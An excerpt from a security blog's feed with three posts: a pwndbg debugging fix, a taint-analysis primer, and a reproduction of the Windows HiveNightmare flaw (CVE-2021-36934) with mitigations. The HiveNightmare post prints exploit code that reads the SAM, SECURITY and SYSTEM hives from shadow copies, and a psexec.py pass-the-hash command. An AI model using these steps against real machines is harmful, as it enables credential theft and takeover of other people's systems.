↓ 2 skipped</span><br><span class="line">─────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────</span><br><span class="line"> ► f 0 0x555555675150</span><br><span class="line"> f 1 0x555555676c72</span><br><span class="line"> f 2 0x555555679198 JBIG2Stream::readSegments()+1032</span><br><span class="line"> f 3 0x555555679473 JBIG2Stream::reset()+211</span><br><span class="line"> f 4 0x55555560139a</span><br><span class="line"> f 5 0x5555556494a9</span><br><span class="line"> f 6 0x55555564aba0</span><br><span class="line"> f 7 0x55555563c9e5</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────</span><br><span class="line">pwndbg> </span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h3><p>早点查看官方文档,搞清楚版本,不要盲目debug。。</p>]]></content>
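The check above can be scripted. The following is an added example, not code from the original post: it pulls the libpython version out of `readelf -d` output, compares it with the interpreter pwndbg will use, and reports a mismatch before you spend an afternoon debugging. The function names are mine; the only real tools invoked are readelf and python3, and the readelf text used for the self-check is constructed, not captured from a machine.

```sh
#!/bin/sh
# Added example (not from the original post): check that the libpython gdb was
# linked against matches the python3 interpreter pwndbg is installed for.
# Function names are mine; the only real commands used are readelf and python3.

# Extract "X.Y" from the NEEDED entries of `readelf -d gdb` output.
gdb_python_version() {
    printf '%s\n' "$1" | sed -n 's/.*\[libpython\([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p' | head -n 1
}

# Extract "X.Y" from `python3 --version` output such as "Python 3.10.12".
interp_version() {
    printf '%s\n' "$1" | sed -n 's/^Python \([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p'
}

# Succeeds only when the gdb-side version is known and equals the interpreter's.
versions_match() {
    [ -n "$1" ] || return 1
    [ "$1" = "$2" ]
}

# Compare the two, print a one-line verdict; returns 1 on mismatch.
report() {
    g=$(gdb_python_version "$1")
    p=$(interp_version "$2")
    if versions_match "$g" "$p"; then
        echo "ok: gdb links libpython$g, python3 is $p"
    else
        echo "mismatch: gdb links libpython${g:-none}, python3 is $p"
        return 1
    fi
}

# Live check against the installed gdb and python3 (returns 2 if gdb is missing).
check_live() {
    gdb_bin=$(command -v gdb) || { echo "gdb not found"; return 2; }
    report "$(readelf -d "$gdb_bin")" "$(python3 --version)"
}

# Constructed sample of readelf output (not captured from a real system).
SAMPLE_READELF=' 0x0000000000000001 (NEEDED)             Shared library: [libpython3.8.so.1.0]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]'
```

Call `check_live` after building gdb; on a mismatch either rebuild gdb with `./configure --with-python=$(command -v python3)` as the post does, or install pwndbg for the interpreter that gdb actually embeds.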
<summary type="html"><h2 id="前情提要"><a href="#前情提要" class="headerlink" title="Background"></a>Background</h2><p>When I fired up gdb, I found that pwndbg would not load...</p></summary>
<category term="Security" scheme="https://f23y.github.io/categories/Security/"/>
<category term="pwndbg" scheme="https://f23y.github.io/tags/pwndbg/"/>
</entry>
<entry>
<title>A Beginner Learns Taint Analysis</title>
<link href="https://f23y.github.io/2022/01/18/%E5%B0%8F%E7%99%BD%E5%AD%A6%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90/"/>
<id>https://f23y.github.io/2022/01/18/%E5%B0%8F%E7%99%BD%E5%AD%A6%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90/</id>
<published>2022-01-17T17:33:09.000Z</published>
<updated>2025-09-27T11:01:40.173Z</updated>
<content type="html"><![CDATA[<p>(The "beginner" in the title refers to me.)</p><h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 Introduction"></a>0x00 Introduction</h2><p><strong>Taint analysis</strong> is a practical form of <strong>information-flow</strong> analysis. It is widely used for information-leak detection, vulnerability discovery and reverse engineering, and has been ported to many environments and platforms. The technique marks the data in a system or application as either tainted or untainted; when tainted data can influence untainted data according to the information-flow propagation policy, the untainted data is re-marked as tainted, and when a taint label finally travels with the data into a designated storage region or leak point, the system is judged to have violated the information-flow policy. Depending on whether the target software is executed, taint analysis is usually divided into static taint analysis (STA) and dynamic taint analysis (DTA). Depending on the granularity at which the target program is analysed, it is divided into coarse-grained and fine-grained taint analysis.</p><span id="more"></span><img src="https://pic.imgdb.cn/item/61e598dc2ab3f51d91737d16.png" style="zoom: 50%;" /><h2 id="0x01-污点分析原理"><a href="#0x01-污点分析原理" class="headerlink" title="0x01 How taint analysis works"></a>0x01 How taint analysis works</h2><p>A taint analysis model consists of <strong>taint sources</strong>, <strong>taint sinks</strong> and <strong>sanitizers</strong>.</p><p>Source: the point where taint enters the program, i.e. where untrusted or confidential data is introduced into the system.</p><p>Sink: the point where the system writes tainted data into a sensitive data region or sends it to the outside world, so that the sensitive region is illegally overwritten or private data leaks. The sensitive operations fall into four groups: (1) memory allocation functions; (2) array access instructions; (3) loop control; (4) dangerous functions such as strcpy/printf/fprintf.</p><p>Sanitizer: an operation such as encryption or re-assignment after which the data, as it propagates further, can no longer harm the integrity or confidentiality of the system.</p><p>Taint analysis proceeds in three stages: (1) identify sources and sinks; (2) analyse taint propagation; (3) account for sanitization.</p><img src="https://pic.imgdb.cn/item/61e599392ab3f51d9173c657.png" style="zoom: 67%;" /><p>Tainted data propagates through a system or application mainly via dependencies between data, which come in two kinds: data dependencies and control dependencies. Data dependencies cover direct assignment, arithmetic and similar operations between variables; control dependencies cover conditional checks and jumps whose outcome depends on a variable.</p><p><img src="https://pic.imgdb.cn/item/61e5ab9e2ab3f51d91810c6b.png" alt="5.5_overview"></p><h2 id="0x02-静态污点分析"><a href="#0x02-静态污点分析" class="headerlink" title="0x02 Static taint analysis"></a>0x02 Static taint analysis</h2><p>Static taint analysis examines the data and control dependencies between variables offline, without running or modifying the code, to determine whether tainted data can flow from a source to a sink. Its object is the program's source code or an intermediate representation (IR). Its advantage is high code coverage; its drawbacks are that it cannot observe the program's real execution, that the analysis is complex, and that the over-approximation of every possible path produces many false positives. LLVM IR is worth learning for this, for example by working through <a href="https://github.com/UofT-EcoSystem/CSCD70">CSCD70</a>.</p><img src="https://pic.imgdb.cn/item/61e5c0a52ab3f51d918c0127.png" alt="LLVMIR" style="zoom: 80%;" /><h2 id="0x03-动态污点分析"><a href="#0x03-动态污点分析" class="headerlink" title="0x03 Dynamic taint analysis"></a>0x03 Dynamic taint analysis</h2><p>Dynamic taint analysis tracks and records the values of program variables, registers and memory in real time while the target program runs, to determine whether tainted data can flow from a source to a sink. It has three main stages:</p><p>1) Taint marking (source identification): the input data at source points, i.e. external data arriving from the network, files or other devices, is marked as tainted. Shadow memory is the usual marking technique: if a register or memory location holds tainted data, the shadow memory holds a pointer to a taint descriptor associated one-to-one with that data, which stores the information about the taint; otherwise the shadow entry is empty. To follow explicit propagation, every data-movement and arithmetic instruction is monitored before it executes; when the result is contaminated by one of its operands, the shadow memory of the result is set to point at the descriptor of the tainting operand.</p><img src="https://pic.imgdb.cn/item/61e59a5f2ab3f51d9174a4d6.jpg" style="zoom:50%;" /><p>2) Taint propagation (dynamic tracking): the flow of tainted data is followed as the program executes. If tainted data is copied into another buffer, or takes part in an operation, so that other memory becomes untrusted, that memory is marked "tainted" as well. Dynamic taint tracking is usually built on one of three mechanisms: dynamic binary instrumentation (e.g. DynamoRIO, Pin, Valgrind), whole-system emulation, or a virtual machine monitor. Binary-level taint analysis works at one of two levels: directly on the instruction set (x86 and the like, which is more efficient) or on an intermediate language (IR).</p><img src="https://pic.imgdb.cn/item/61e59b232ab3f51d91753399.png" style="zoom:80%;" /><p>3) Attack detection (policies and rules): check whether the program uses tainted data illegitimately; common checks cover jump-address hijacking, format-string attacks and buffer overflows. If an illegal use is detected, execution is stopped and the potential vulnerability is reported.</p><img src="https://pic.imgdb.cn/item/61e59b3b2ab3f51d917547b1.png" style="zoom:80%;" /><h2 id="0x04-Clang-Static-Analyzer"><a href="#0x04-Clang-Static-Analyzer" class="headerlink" title="0x04 Clang Static Analyzer"></a>0x04 Clang Static Analyzer</h2><p>Source: <a href="https://code.woboq.org/llvm/clang/">https://code.woboq.org/llvm/clang/</a></p><p>Docs: <a href="https://clang.llvm.org/docs/ClangStaticAnalyzer.html">https://clang.llvm.org/docs/ClangStaticAnalyzer.html</a></p><p>Clang AST: <a href="https://www.youtube.com/watch?v=VqCkCDFLSsc">https://www.youtube.com/watch?v=VqCkCDFLSsc</a></p><p>Architecture: Parser, ExprEngine, StateManager, ConstraintManager, StoreManager... (too lazy to draw a diagram)</p><p>You can try writing some checkers of your own. Reference: <a href="https://zhuanlan.zhihu.com/p/369254889">https://zhuanlan.zhihu.com/p/369254889</a></p><p>You can also read <a href="https://github.com/llvm/llvm-project/blob/e356027016c6365b3d8924f54c33e2c63d931492/clang/test/Analysis/Inputs/taint-generic-config.yaml">taint-generic-config</a> to see how sources, propagation rules and sinks are declared for the built-in taint checker.</p><p>Too sleepy... off to bed zzz</p><h2 id="0x05-参考链接"><a href="#0x05-参考链接" class="headerlink" title="0x05 References"></a>0x05 References</h2><p><a href="https://www.k0rz3n.com/2019/03/01/%E7%AE%80%E5%8D%95%E7%90%86%E8%A7%A3%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF/">https://www.k0rz3n.com/2019/03/01/%E7%AE%80%E5%8D%95%E7%90%86%E8%A7%A3%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF/</a></p><p><a href="https://www.bookstack.cn/read/CTF-All-In-One/doc-5.5_taint_analysis.md#%E5%8A%A8%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90">https://www.bookstack.cn/read/CTF-All-In-One/doc-5.5_taint_analysis.md#%E5%8A%A8%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90</a></p><p><a href="https://hexterisk.github.io/blog/posts/2020/05/03/taint-analysis/">https://hexterisk.github.io/blog/posts/2020/05/03/taint-analysis/</a></p><p><a href="https://hexterisk.github.io/blog/posts/2020/06/03/dynamic-binary-instrumentation-and-pin/">https://hexterisk.github.io/blog/posts/2020/06/03/dynamic-binary-instrumentation-and-pin/</a></p><p><a href="https://xueshu.baidu.com/usercenter/paper/show?paperid=1b0f00d0aw7g0tr0by4w0gn0cs524325&site=xueshu_se">https://xueshu.baidu.com/usercenter/paper/show?paperid=1b0f00d0aw7g0tr0by4w0gn0cs524325&site=xueshu_se</a></p><p><a href="https://xz.aliyun.com/t/7979">https://xz.aliyun.com/t/7979</a></p><p><a href="https://xueshu.baidu.com/usercenter/paper/show?paperid=2e4f5bd4cac517e72fd7fc80c74b047a&site=xueshu_se">https://xueshu.baidu.com/usercenter/paper/show?paperid=2e4f5bd4cac517e72fd7fc80c74b047a&site=xueshu_se</a></p><p><a href="https://arxiv.org/pdf/2007.05955.pdf">https://arxiv.org/pdf/2007.05955.pdf</a></p>]]></content>
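The three stages of dynamic taint analysis described above (marking at a source, explicit propagation along data dependencies through shadow state, and a check at every sink) are small enough to run end to end on a toy machine. The following is an added example written for this page; it is not code from the post and not the interface of Pin, Valgrind, DynamoRIO or the Clang analyzer. The instruction names, the `Machine` class and the sample program are assumptions for illustration only. The constructed program models a byte read from the network that is used first as an allocation size and then as an indirect jump target, with an `xor r, r` in between acting as a sanitizer; only explicit (data-dependency) propagation is tracked, as in the post's description of stage 1.

```python
from dataclasses import dataclass, field


@dataclass
class Machine:
    """Toy machine plus shadow state: one set of taint labels per register / memory cell."""
    regs: dict = field(default_factory=dict)        # register name -> int value
    mem: dict = field(default_factory=dict)         # address -> byte value
    reg_taint: dict = field(default_factory=dict)   # register name -> set of labels
    mem_taint: dict = field(default_factory=dict)   # address -> set of labels
    alerts: list = field(default_factory=list)      # (sink kind, register, labels)

    def taint_of_reg(self, r):
        return self.reg_taint.get(r, set())

    def taint_of_mem(self, addr):
        return self.mem_taint.get(addr, set())

    def source(self, addr, data, label):
        """Stage 1: write untrusted bytes into memory and label each cell tainted."""
        for i, b in enumerate(data):
            self.mem[addr + i] = b
            self.mem_taint[addr + i] = {label}

    def step(self, ins):
        """Stage 2: execute one instruction, propagating taint along its data flow."""
        op = ins[0]
        if op == "imm":                    # imm r, value: a constant carries no taint
            _, r, v = ins
            self.regs[r] = v
            self.reg_taint[r] = set()
        elif op == "load":                 # load r, [a]: r inherits the taint of the cell
            _, r, a = ins
            addr = self.regs[a]
            self.regs[r] = self.mem.get(addr, 0)
            self.reg_taint[r] = set(self.taint_of_mem(addr))
        elif op == "store":                # store [a], r: the cell inherits the taint of r
            _, a, r = ins
            addr = self.regs[a]
            self.mem[addr] = self.regs[r]
            self.mem_taint[addr] = set(self.taint_of_reg(r))
        elif op == "add":                  # add d, s: result tainted if either operand is
            _, d, s = ins
            self.regs[d] = self.regs[d] + self.regs[s]
            self.reg_taint[d] = self.taint_of_reg(d) | self.taint_of_reg(s)
        elif op == "xor":                  # xor d, s: "xor r, r" always yields 0, so it sanitizes
            _, d, s = ins
            self.regs[d] = self.regs[d] ^ self.regs[s]
            self.reg_taint[d] = set() if d == s else self.taint_of_reg(d) | self.taint_of_reg(s)
        elif op in ("jmp_reg", "alloc", "fmt"):   # the sinks of this toy machine
            _, r = ins
            self.check_sink(op, r)
        else:
            raise ValueError("unknown op: " + op)

    def check_sink(self, kind, r):
        """Stage 3: a tainted operand reaching a sensitive operation raises an alert."""
        labels = self.taint_of_reg(r)
        if labels:
            self.alerts.append((kind, r, sorted(labels)))


def run(program):
    """Execute a program (list of tuples) and return the machine with its alerts."""
    m = Machine()
    for ins in program:
        if ins[0] == "source":
            _, addr, data, label = ins
            m.source(addr, data, label)
        else:
            m.step(ins)
    return m


# Constructed sample program (not from any real binary): four bytes arrive from the
# network at 0x1000; one of them feeds an allocation size and, later, an indirect jump.
SAMPLE = [
    ("source", 0x1000, [0x41, 0x42, 0x43, 0x44], "net"),
    ("imm", "rbx", 0x1000),
    ("load", "rax", "rbx"),        # rax = tainted byte 0x41
    ("imm", "rcx", 8),
    ("add", "rcx", "rax"),         # rcx = 8 + rax, now tainted
    ("alloc", "rcx"),              # sink: attacker-controlled allocation size
    ("xor", "rax", "rax"),         # sanitizer: rax becomes 0 and loses its taint
    ("jmp_reg", "rax"),            # no alert: the taint was cleared
    ("load", "rdx", "rbx"),        # rdx = tainted byte again
    ("jmp_reg", "rdx"),            # sink: tainted jump target (control-flow hijack)
]


def demo():
    """Alerts for SAMPLE: the tainted alloc size and the tainted jump target."""
    return run(SAMPLE).alerts


if __name__ == "__main__":
    for kind, reg, labels in demo():
        print(kind, reg, labels)
```

Two design points carry over to real trackers: taint is a set of labels rather than a bit, so an alert can name which source reached the sink, and `xor r, r` is handled as a sanitizer because its result never depends on the input; a tracker that only looks at operand taint would keep the register tainted and produce a false positive at the first `jmp_reg`.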
<summary type="html"><p>(The "beginner" in the title refers to me.)</p>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 Introduction"></a>0x00 Introduction</h2><p><strong>Taint analysis</strong> is a practical form of <strong>information-flow</strong> analysis. It is widely used for information-leak detection, vulnerability discovery and reverse engineering, and has been ported to many environments and platforms. The technique marks the data in a system or application as either tainted or untainted; when tainted data can influence untainted data according to the information-flow propagation policy, the untainted data is re-marked as tainted, and when a taint label finally travels with the data into a designated storage region or leak point, the system is judged to have violated the information-flow policy. Depending on whether the target software is executed, taint analysis is usually divided into static taint analysis (STA) and dynamic taint analysis (DTA). Depending on the granularity at which the target program is analysed, it is divided into coarse-grained and fine-grained taint analysis.</p></summary>
<category term="Security" scheme="https://f23y.github.io/categories/Security/"/>
<category term="taint analyzer" scheme="https://f23y.github.io/tags/taint-analyzer/"/>
</entry>
<entry>
<title>Windows privilege escalation: CVE-2021-36934 (HiveNightmare) reproduction and analysis</title>
<link href="https://f23y.github.io/2021/12/19/Windows%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%EF%BC%9ACVE-2021-36934(HiveNightmare)%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90/"/>
<id>https://f23y.github.io/2021/12/19/Windows%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%EF%BC%9ACVE-2021-36934(HiveNightmare)%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90/</id>
<published>2021-12-18T17:31:33.000Z</published>
<updated>2025-09-27T11:01:25.516Z</updated>
<content type="html"><![CDATA[<p>This was originally written for our team's public WeChat account, but for particular reasons it had to be pulled, so it goes on the blog instead. It has been a while...</p><h2 id="0x01-漏洞描述"><a href="#0x01-漏洞描述" class="headerlink" title="0x01 Vulnerability description"></a>0x01 Vulnerability description</h2><p>CVE-2021-36934 is an elevation-of-privilege vulnerability caused by overly permissive access control lists (ACLs) on several Windows system files, including the Security Account Manager (SAM) database. An attacker who exploits it can go from a normal user account to SYSTEM and execute arbitrary code on the target, taking control of the machine. Exploitation has preconditions: the target must have System Protection enabled and at least one system restore point, because the live hive under %windir%\System32\config is held open by the kernel and cannot be read directly, while the copy inside a volume shadow copy can. On Windows 10 with a C: drive larger than 128 GB, System Protection is on by default and restore points are created automatically, and the exploit dumps the SAM from the shadow copy that backs such a restore point.</p><span id="more"></span><p>Severity:</p><img src="https://pic.imgdb.cn/item/60fdeae15132923bf8f4ebfe.png" alt="1" style="zoom:80%;" /><p>Affected versions:</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Windows Server, version 20H2 (Server Core Installation)</span><br><span class="line">Windows 10 Version 20H2 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 20H2 for 32-bit Systems</span><br><span class="line">Windows 10 Version 20H2 for x64-based Systems</span><br><span class="line">Windows Server, version 2004 (Server Core installation)</span><br><span class="line">Windows 10 Version 2004 for x64-based Systems</span><br><span class="line">Windows 10 Version 2004 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 2004 for 32-bit Systems</span><br><span class="line">Windows 10 Version 21H1 for 32-bit Systems</span><br><span class="line">Windows 10 Version 21H1 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 21H1 for x64-based Systems</span><br><span class="line">Windows 10 Version 1909 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1909 for x64-based Systems</span><br><span class="line">Windows 10 Version 1909 for 32-bit Systems</span><br><span class="line">Windows Server 2019 (Server Core installation)</span><br><span class="line">Windows Server 2019</span><br><span class="line">Windows 10 Version 1809 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1809 for 32-bit Systems</span><br><span class="line">Windows 10 Version 1809 for x64-based Systems</span><br></pre></td></tr></table></figure><h2 id="0x02-漏洞复现"><a href="#0x02-漏洞复现" class="headerlink" title="0x02 Reproduction"></a>0x02 Reproduction</h2><p>Run the following command (icacls only reads the DACL here, so it works from a standard user prompt as well as an administrator one):</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">icacls c:\Windows\System32\Config\SAM</span><br></pre></td></tr></table></figure><p>If the output contains <code>BUILTIN\Users:(I)(RX)</code>, the system is vulnerable: an inherited ACE grants every member of Users read and execute access to the hive.</p><img src="https://pic.imgdb.cn/item/60fdeaf55132923bf8f5107a.png" alt="2" style="zoom: 80%;" /><p>Jonas L found this permission problem on Windows 11: non-administrator users can access the sensitive configuration under c:\Windows\System32\config\, which includes credential stores such as the SAM. Through it a non-administrator can read out the administrators' password hashes, and on an internal network that enables lateral movement such as pass-the-hash.</p><img src="https://pic.imgdb.cn/item/60fdeb0e5132923bf8f53c46.png" alt="E6rsUghWYAgHD1d" /> <p>(FileTest is used here to read the file: after obtaining a handle to the SAM with CreateFile, the contents are read with ReadFile.)</p><p>Download and run the exploit to read the SAM, SYSTEM and SECURITY hives.</p><img src="https://pic.imgdb.cn/item/60fdeb255132923bf8f56532.png" alt="2" style="zoom:80%;" /><p>Three new files appear.</p><p> <img src="https://pic.imgdb.cn/item/60fdeb365132923bf8f58420.png" alt="3" style="zoom:80%;" /></p><p>Copy the three files to Kali and use secretsdump.py from impacket to extract the administrator account's hash.</p><p><img src="https://pic.imgdb.cn/item/60fdeb4c5132923bf8f5ac6a.png" alt="4"></p><p>Then open a cmd on the target with psexec.py and do as you please.</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">psexec.py -hashes LMHASH:NTHASH administrator@TARGET_IP cmd.exe</span><br></pre></td></tr></table></figure><h2 id="0x03-EXP分析"><a href="#0x03-EXP分析" class="headerlink" title="0x03 Exploit analysis"></a>0x03 Exploit analysis</h2><p>(There is not much to analyse, really.)</p><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line"><span class="comment">// The live SAM is locked, so fullPath points at the copy inside a VSS snapshot</span></span><br><span class="line"><span class="comment">// (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\config\SAM), which is not</span></span><br><span class="line"> hfile = <span class="built_in">CreateFile</span>(fullPath, GENERIC_READ, <span class="number">0</span>, <span class="literal">NULL</span>, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, <span class="literal">NULL</span>);</span><br></pre></td></tr></table></figure><p>After that it is essentially three near-identical blocks that read and dump SAM, SECURITY and SYSTEM.</p><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line"> wcout << <span class="string">L"\nHiveNightmare v0.5 - dump registry hives as non-admin users\n\nSpecify maximum number of shadows to inspect with parameter if wanted, default is 15.\n\nRunning...\n\n"</span>;</span><br><span class="line"></span><br><span class="line"> HANDLE hFile;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Paths of the sensitive files to read, relative to the root of each shadow volume</span></span><br><span class="line"> TCHAR samLocation[] = <span class="string">L"Windows\\System32\\config\\SAM"</span>;</span><br><span class="line"> TCHAR securityLocation[] = <span class="string">L"Windows\\System32\\config\\SECURITY"</span>;</span><br><span class="line"> TCHAR systemLocation[] = <span class="string">L"Windows\\System32\\config\\SYSTEM"</span>;</span><br><span class="line"> TCHAR fileTime[<span class="number">200</span>];</span><br><span class="line"> TCHAR fileName[<span class="number">20</span>];</span><br><span class="line"></span><br><span class="line">hFile = <span class="built_in">getVssFileHandle</span>(samLocation, searchDepth);</span><br><span class="line"> <span class="keyword">if</span> (hFile == INVALID_HANDLE_VALUE) {</span><br><span class="line"> wcout << <span class="string">"Could not open SAM :( Is System Protection not enabled or vulnerability fixed? Try increasing the number of VSS snapshots to search - list snapshots with vssadmin list shadows\n"</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>; <span class="comment">// error handling: no shadow copy yielded a readable Windows\System32\config\SAM</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="built_in">getFileTime</span>(hFile, fileTime, <span class="number">200</span>);</span><br><span class="line"> <span class="built_in">swprintf_s</span>(fileName, <span class="string">L"SAM-%s"</span>, fileTime); <span class="comment">//buggy if name too long</span></span><br><span class="line"> <span class="built_in">dumpHandleToFile</span>(hFile, fileName);</span><br><span class="line"> <span class="built_in">CloseHandle</span>(hFile); <span class="comment">// done, close the file handle</span></span><br><span class="line"> wcout << endl << <span class="string">L"Success: SAM hive from "</span> << fileTime << <span class="string">L" written out to current working directory as "</span> << fileName << endl << endl;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> <span class="comment">// The same steps are then repeated for SECURITY and SYSTEM</span></span><br></pre></td></tr></table></figure><h2 id="0x04-缓解措施"><a href="#0x04-缓解措施" class="headerlink" title="0x04 Mitigation"></a>0x04 Mitigation</h2><p>At the time of writing Microsoft had not yet released a security update, so users were advised to protect themselves with the temporary workarounds below.</p><p>Temporary workarounds:</p><ol><li>Restrict access to the contents of %windir%\system32\config</li></ol><p>Open a Command Prompt or Windows PowerShell as administrator and run:</p><p><code>icacls %windir%\system32\config\*.* /inheritance:e</code></p><ol start="2"><li>Delete Volume Shadow Copy Service (VSS) shadow copies</li></ol><p>Delete any system restore points and shadow volumes that existed before access to %windir%\system32\config was restricted, then create a new restore point if needed.</p><p>Note on the impact of this workaround: deleting shadow copies can affect restore operations, including the ability to restore data with third-party backup applications. Both steps are necessary: fixing the ACL on the live files does nothing for the copies already captured in existing snapshots, so those snapshots must be removed as well.</p><ol start="3"><li><p>Run the mitigation script</p><p><a href="https://github.com/GossiTheDog/HiveNightmare/blob/master/Mitigation.ps1">https://github.com/GossiTheDog/HiveNightmare/blob/master/Mitigation.ps1</a></p></li></ol><h2 id="0x05-检测"><a href="#0x05-检测" class="headerlink" title="0x05 Detection"></a>0x05 Detection</h2><p>Detection with EDR tooling:</p><p>Microsoft Defender for Endpoint</p><p><a href="https://github.com/GossiTheDog/ThreatHunting/blob/master/AdvancedHuntingQueries/CVE-2021-36934-HiveNightmare-Defender.ahq">ThreatHunting/CVE-2021–36934-HiveNightmare-Defender.ahq at master · GossiTheDog/ThreatHunting (github.com)</a></p><p><a href="https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWNwQrCQAxE51zwH5b-h4ei7VVRf6DUtS0stthQEfx4X1Pw5E2W7CSTmcxeUbN6NWBJF3WXaVLQm3qqg3lQQQUaQzmguOil0dktLyjXgd2qLZQcTScwqaaLun79S5rhz39kVFxPaJf56M4OtvFMY-7ByfPObGqUA_4d_-gXN8r-uLlyN5iW6QPURz47GgEAAA&runQuery=true&timeRangeId=week">M365 Defender query link</a></p><p>McAfee EDR block rule</p><p><a href="https://github.com/GossiTheDog/ThreatHunting/blob/master/EDR-BlockRules/CVE-2021-36934-HiveNightmare-Mcafee">ThreatHunting/CVE-2021–36934-HiveNightmare-Mcafee at master · GossiTheDog/ThreatHunting (github.com)</a></p><p>Azure Sentinel</p><p><a href="https://github.com/GossiTheDog/ThreatHunting/blob/master/AdvancedHuntingQueries/CVE-2021-36934-HiveNightmare-Sentinel-Events">ThreatHunting/CVE-2021–36934-HiveNightmare-Sentinel-Events at master · GossiTheDog/ThreatHunting (github.com)</a></p><h2 id="0x06-参考链接"><a href="#0x06-参考链接" class="headerlink" title="0x06 References"></a>0x06 References</h2><p><a href="https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5">https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5</a></p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934</a></p><p><a href="https://github.com/GossiTheDog/HiveNightmare/">https://github.com/GossiTheDog/HiveNightmare/</a></p><p>A quiet aside: the practical exploitation scenario seems limited unless it is combined with something like tricking the user into downloading and running it... (social engineering wins again)</p>]]></content>
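The reproduction and mitigation sections above boil down to two checks a defender can script: does any hive under %windir%\System32\config grant BUILTIN\Users read access, and is there a VSS snapshot to read it from. The following PowerShell is an added example written for this page, not code from the post or from the HiveNightmare repository; the function name, the output fields and the SID-based comparison are my own choices. Enumerating Win32_ShadowCopy may need an elevated session on some builds, so a shadow-copy count of 0 from a normal prompt is not proof that no snapshot exists.

```powershell
# Added example: read-only exposure check for CVE-2021-36934 (HiveNightmare).
# Not code from the original post or the HiveNightmare repository; the function
# name and the output fields are my own.

function Test-HiveNightmareExposure {
    [CmdletBinding()]
    param(
        [string]$ConfigDir = (Join-Path $env:windir 'System32\config'),
        [string[]]$Hives = @('SAM', 'SECURITY', 'SYSTEM')
    )

    $usersSid = 'S-1-5-32-545'   # BUILTIN\Users, compared by SID so localized names do not matter
    $readData = [System.Security.AccessControl.FileSystemRights]::ReadData
    $exposed  = @()

    foreach ($hive in $Hives) {
        $path = Join-Path $ConfigDir $hive
        # Get-Acl only needs READ_CONTROL on the file, which Users has even while the
        # hive itself is held open exclusively by the kernel.
        $acl = Get-Acl -LiteralPath $path
        foreach ($ace in $acl.Access) {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            $grantsRead = ($ace.FileSystemRights -band $readData) -ne 0
            if ($sid -eq $usersSid -and $ace.AccessControlType -eq 'Allow' -and $grantsRead) {
                $exposed += [pscustomobject]@{
                    Hive      = $hive
                    Rights    = $ace.FileSystemRights    # icacls shows this as (RX)
                    Inherited = $ace.IsInherited         # icacls shows this as (I)
                }
            }
        }
    }

    # The over-permissive ACL is only exploitable through a VSS snapshot, because the
    # live hive is locked. Enumerating Win32_ShadowCopy may require elevation, so a
    # count of 0 here does not prove that no snapshot exists.
    $shadows = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        ExposedHives      = $exposed
        ShadowCopyCount   = $shadows.Count
        ShadowDevices     = @($shadows | ForEach-Object { $_.DeviceObject })
        LikelyExploitable = ($exposed.Count -gt 0) -and ($shadows.Count -gt 0)
    }
}

# Usage from a normal (non-elevated) PowerShell prompt:
#   Test-HiveNightmareExposure | Format-List
```

Run it before and after applying the two workarounds: after `icacls ... /inheritance:e` the ExposedHives list should be empty, and after deleting the shadow copies ShadowCopyCount should be 0; either one alone leaves LikelyExploitable true for the reason given in the mitigation note above.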
<summary type="html"><p>This was originally written for our team's public WeChat account, but for particular reasons it had to be pulled, so it goes on the blog instead. It has been a while...</p>
<h2 id="0x01-漏洞描述"><a href="#0x01-漏洞描述" class="headerlink" title="0x01 Vulnerability description"></a>0x01 Vulnerability description</h2><p>CVE-2021-36934 is an elevation-of-privilege vulnerability caused by overly permissive access control lists (ACLs) on several Windows system files, including the Security Account Manager (SAM) database. An attacker who exploits it can go from a normal user account to SYSTEM and execute arbitrary code on the target, taking control of the machine. Exploitation has preconditions: the target must have System Protection enabled and at least one system restore point, because the live hive is locked while Windows is running. On Windows 10 with a C: drive larger than 128 GB, System Protection is on by default and restore points are created automatically, and the exploit dumps the SAM from the shadow copy that backs such a restore point.</p></summary>
<category term="CI/CD" scheme="https://f23y.github.io/categories/CI-CD/"/>
